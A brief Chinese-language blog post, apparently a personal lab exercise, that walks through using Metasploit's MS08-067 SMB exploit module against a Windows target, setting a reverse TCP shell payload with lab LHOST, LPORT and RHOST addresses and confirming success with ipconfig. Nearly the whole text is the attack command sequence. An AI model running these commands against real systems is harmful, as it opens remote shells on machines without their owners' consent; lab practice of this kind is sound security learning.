标签:分享 net gen 简单 msf xpl 基础 使用 成功
调用该模块:use exploit/windows/smb/ms08_067_netapi
并且查看可以使用的载荷show payloads
set payload generic/shell_reverse_tcp
。set LHOST 192.168.224.142
。set LPORT 5339
。set RHOST 192.168.224.144
。查看有哪些靶机类型show targets
。
set target 0
。成功攻击我的靶机,使用一个ipconfig
命令来进行验证。
标签:分享 net gen 简单 msf xpl 基础 使用 成功
原文地址:https://www.cnblogs.com/pingcpingcuo/p/8969575.html